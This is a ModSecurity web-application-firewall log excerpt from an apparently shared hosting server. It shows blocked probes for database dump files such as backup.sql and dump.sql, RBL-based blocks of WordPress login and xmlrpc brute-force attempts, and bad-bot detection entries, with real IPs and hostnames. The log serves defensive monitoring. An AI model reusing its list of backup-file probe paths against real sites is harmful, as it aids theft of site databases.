[Tue May 26 16:14:17.540668 2026] [security2:error] [pid 782634:tid 782780] [client 52.167.144.66:3586] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.koneksi.com.co"] [uri "/index.php"] [unique_id "ahV5gP_P9qBfeb1w76ZBzAAAABA"]
[Tue May 26 16:14:17.824521 2026] [security2:error] [pid 782634:tid 782849] [client 13.220.243.41:55949] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/sql.sql"] [unique_id "ahV5gf_P9qBfeb1w76ZB5wAAAFU"]
[Tue May 26 16:14:18.546265 2026] [security2:error] [pid 782634:tid 782842] [client 13.220.243.41:56134] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/temp.sql"] [unique_id "ahV5gv_P9qBfeb1w76ZB9AAAAE4"]
[Tue May 26 16:14:18.551024 2026] [security2:error] [pid 782634:tid 782873] [client 103.44.52.196:43076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5gv_P9qBfeb1w76ZB9QAAAG0"]
[Tue May 26 16:14:18.551110 2026] [security2:error] [pid 782634:tid 782873] [client 103.44.52.196:43076] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5gv_P9qBfeb1w76ZB9QAAAG0"]
[Tue May 26 16:14:18.572777 2026] [security2:error] [pid 782634:tid 782875] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5gv_P9qBfeb1w76ZB7gAAAG8"]
[Tue May 26 16:14:18.957227 2026] [security2:error] [pid 782634:tid 782802] [client 13.220.243.41:56313] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/translate.sql"] [unique_id "ahV5gv_P9qBfeb1w76ZCAAAAACY"]
[Tue May 26 16:14:19.216856 2026] [security2:error] [pid 782634:tid 782805] [client 106.219.85.83:28488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5g__P9qBfeb1w76ZCBAAAACk"]
[Tue May 26 16:14:19.217207 2026] [security2:error] [pid 782634:tid 782805] [client 106.219.85.83:28488] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5g__P9qBfeb1w76ZCBAAAACk"]
[Tue May 26 16:14:19.399762 2026] [security2:error] [pid 782634:tid 782783] [client 13.220.243.41:56456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/users.sql"] [unique_id "ahV5g__P9qBfeb1w76ZCDQAAABM"]
[Tue May 26 16:14:19.807812 2026] [security2:error] [pid 782634:tid 782835] [client 13.220.243.41:56592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/www.sql"] [unique_id "ahV5g__P9qBfeb1w76ZCFQAAAEc"]
[Tue May 26 16:14:20.168127 2026] [security2:error] [pid 782634:tid 782813] [client 13.220.243.41:56729] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/wp-content/uploads/dump.sql"] [unique_id "ahV5hP_P9qBfeb1w76ZCJwAAADE"]
[Tue May 26 16:14:20.342234 2026] [security2:error] [pid 782634:tid 782676] [remote 141.95.202.18:39230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV5hP_P9qBfeb1w76ZCJgAABik"]
[Tue May 26 16:14:20.671546 2026] [security2:error] [pid 782634:tid 782875] [client 13.220.243.41:56910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/wp-content/uploads/backup.sql"] [unique_id "ahV5hP_P9qBfeb1w76ZCMgAAAG8"]
[Tue May 26 16:14:21.034931 2026] [security2:error] [pid 782634:tid 782802] [client 13.220.243.41:57019] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/wp-content/uploads/database.sql"] [unique_id "ahV5hf_P9qBfeb1w76ZCOwAAACY"]
[Tue May 26 16:14:21.101216 2026] [security2:error] [pid 782634:tid 782830] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5hP_P9qBfeb1w76ZCNQAAAEI"]
[Tue May 26 16:14:21.349662 2026] [security2:error] [pid 782634:tid 782764] [client 13.220.243.41:57144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/wp-content/uploads/wrapmachines.sql"] [unique_id "ahV5hf_P9qBfeb1w76ZCRAAAAAA"]
[Tue May 26 16:14:21.749147 2026] [security2:error] [pid 782634:tid 782778] [client 13.220.243.41:57257] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/wp-content/uploads/mysql.sql"] [unique_id "ahV5hf_P9qBfeb1w76ZCUQAAAA4"]
[Tue May 26 16:14:21.987202 2026] [security2:error] [pid 782634:tid 782868] [client 85.208.96.197:49074] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahV5hf_P9qBfeb1w76ZCVAAAAGg"]
[Tue May 26 16:14:21.987380 2026] [security2:error] [pid 782634:tid 782868] [client 85.208.96.197:49074] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahV5hf_P9qBfeb1w76ZCVAAAAGg"]
[Tue May 26 16:14:22.349015 2026] [security2:error] [pid 782634:tid 782871] [client 13.220.243.41:57414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/wp-content/database.sql"] [unique_id "ahV5hv_P9qBfeb1w76ZCWwAAAGs"]
[Tue May 26 16:14:22.832056 2026] [security2:error] [pid 782634:tid 782770] [client 13.220.243.41:57607] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/backups/database.sql"] [unique_id "ahV5hv_P9qBfeb1w76ZCaAAAAAY"]
[Tue May 26 16:14:23.351768 2026] [security2:error] [pid 782634:tid 782766] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5hv_P9qBfeb1w76ZCbQAAAAI"]
[Tue May 26 16:14:23.527147 2026] [security2:error] [pid 782634:tid 782765] [client 13.220.243.41:57832] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/blog/backup.sql"] [unique_id "ahV5h__P9qBfeb1w76ZCggAAAAE"]
[Tue May 26 16:14:23.996582 2026] [security2:error] [pid 782634:tid 782876] [client 13.220.243.41:57979] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/blog/mysql.sql"] [unique_id "ahV5h__P9qBfeb1w76ZClQAAAHA"]
[Tue May 26 16:14:24.291106 2026] [security2:error] [pid 782634:tid 782792] [client 13.220.243.41:58094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/blog/wrapmachines.sql"] [unique_id "ahV5iP_P9qBfeb1w76ZCmwAAABw"]
[Tue May 26 16:14:24.928124 2026] [security2:error] [pid 782634:tid 782839] [client 13.220.243.41:58303] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahV5iP_P9qBfeb1w76ZCsgAAAEs"]
[Tue May 26 16:14:25.364928 2026] [security2:error] [pid 782634:tid 782858] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5iP_P9qBfeb1w76ZCswAAAF4"]
[Tue May 26 16:14:25.562491 2026] [security2:error] [pid 782634:tid 782836] [client 13.220.243.41:58465] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/blog/db.sql"] [unique_id "ahV5if_P9qBfeb1w76ZCwQAAAEg"]
[Tue May 26 16:14:25.674487 2026] [security2:error] [pid 782634:tid 782859] [client 40.77.167.156:6911] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.koneksi.com.co"] [uri "/index.php"] [unique_id "ahV5if_P9qBfeb1w76ZCwwAAAF8"]
[Tue May 26 16:14:25.961744 2026] [security2:error] [pid 782634:tid 782891] [client 13.220.243.41:58606] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/database/backup.sql"] [unique_id "ahV5if_P9qBfeb1w76ZC1AAAAH8"]
[Tue May 26 16:14:27.532399 2026] [security2:error] [pid 782634:tid 782872] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5i__P9qBfeb1w76ZC8gAAAGw"]
[Tue May 26 16:14:28.777788 2026] [security2:error] [pid 782634:tid 782719] [remote 18.190.7.192:57050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahV5jP_P9qBfeb1w76ZDFAAAD1Q"]
[Tue May 26 16:14:28.879181 2026] [security2:error] [pid 782634:tid 782837] [client 103.44.52.196:55312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5jP_P9qBfeb1w76ZDIgAAAEk"]
[Tue May 26 16:14:28.879310 2026] [security2:error] [pid 782634:tid 782837] [client 103.44.52.196:55312] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5jP_P9qBfeb1w76ZDIgAAAEk"]
[Tue May 26 16:14:29.413357 2026] [security2:error] [pid 782634:tid 782806] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5jf_P9qBfeb1w76ZDJwAAACo"]
[Tue May 26 16:14:29.825979 2026] [security2:error] [pid 782634:tid 782875] [client 106.219.85.83:6850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5jf_P9qBfeb1w76ZDOwAAAG8"]
[Tue May 26 16:14:29.826118 2026] [security2:error] [pid 782634:tid 782875] [client 106.219.85.83:6850] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5jf_P9qBfeb1w76ZDOwAAAG8"]
[Tue May 26 16:14:30.549673 2026] [security2:error] [pid 782634:tid 782878] [client 208.91.198.85:30040] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahV5jv_P9qBfeb1w76ZDTwAAAHI"]
[Tue May 26 16:14:31.613842 2026] [security2:error] [pid 782634:tid 782816] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5j__P9qBfeb1w76ZDZgAAADQ"]
[Tue May 26 16:14:33.709325 2026] [security2:error] [pid 782634:tid 782795] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5kf_P9qBfeb1w76ZDmwAAAB8"]
[Tue May 26 16:14:35.132902 2026] [security2:error] [pid 782634:tid 782745] [remote 103.50.205.131:52072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.205.50.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahV5kv_P9qBfeb1w76ZDvQAANW4"]
[Tue May 26 16:14:35.627419 2026] [security2:error] [pid 782634:tid 782865] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5k__P9qBfeb1w76ZDwwAAAGU"]
[Tue May 26 16:14:35.789418 2026] [security2:error] [pid 782634:tid 782834] [client 216.213.24.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5k__P9qBfeb1w76ZD0AAAAEY"], referer: https://www.anujtradingco.com/
[Tue May 26 16:14:37.163475 2026] [security2:error] [pid 782634:tid 782887] [client 216.213.24.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5lf_P9qBfeb1w76ZD7AAAAHs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 16:14:37.894219 2026] [security2:error] [pid 782634:tid 782843] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5lf_P9qBfeb1w76ZD9QAAAE8"]
[Tue May 26 16:14:39.686566 2026] [security2:error] [pid 782634:tid 782861] [client 103.44.52.196:55410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5l__P9qBfeb1w76ZEJgAAAGE"]
[Tue May 26 16:14:39.686728 2026] [security2:error] [pid 782634:tid 782861] [client 103.44.52.196:55410] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5l__P9qBfeb1w76ZEJgAAAGE"]
[Tue May 26 16:14:39.905592 2026] [security2:error] [pid 782634:tid 782878] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5l__P9qBfeb1w76ZEJQAAAHI"]
[Tue May 26 16:14:40.546692 2026] [security2:error] [pid 782634:tid 782845] [client 106.219.85.83:16939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5mP_P9qBfeb1w76ZEQAAAAFE"]
[Tue May 26 16:14:40.546853 2026] [security2:error] [pid 782634:tid 782845] [client 106.219.85.83:16939] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5mP_P9qBfeb1w76ZEQAAAAFE"]
[Tue May 26 16:14:41.147061 2026] [security2:error] [pid 782634:tid 782811] [client 139.180.229.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5mf_P9qBfeb1w76ZEVwAAAC8"], referer: https://www.anujtradingco.com/
[Tue May 26 16:14:41.636976 2026] [security2:error] [pid 782634:tid 782834] [client 74.7.175.148:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lmialumni.org.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahV5mP_P9qBfeb1w76ZETgAAAEY"]
[Tue May 26 16:14:41.640781 2026] [security2:error] [pid 782634:tid 782871] [client 74.7.175.148:41568] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.lmialumni.org.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahV5mP_P9qBfeb1w76ZETAAAa3o"]
[Tue May 26 16:14:41.765807 2026] [security2:error] [pid 782634:tid 782890] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5mf_P9qBfeb1w76ZEZAAAAH4"]
[Tue May 26 16:14:42.474827 2026] [security2:error] [pid 782634:tid 782879] [client 139.180.229.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5mv_P9qBfeb1w76ZEggAAAHM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 16:14:44.062855 2026] [security2:error] [pid 782634:tid 782882] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5m__P9qBfeb1w76ZEqgAAAHY"]
[Tue May 26 16:14:45.684964 2026] [security2:error] [pid 782634:tid 782656] [remote 45.55.33.147:52992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.33.55.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahV5nf_P9qBfeb1w76ZEzQAADRU"]
[Tue May 26 16:14:45.731635 2026] [security2:error] [pid 782634:tid 782653] [remote 109.205.180.55:59242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahV5nf_P9qBfeb1w76ZE0QAAZBI"]
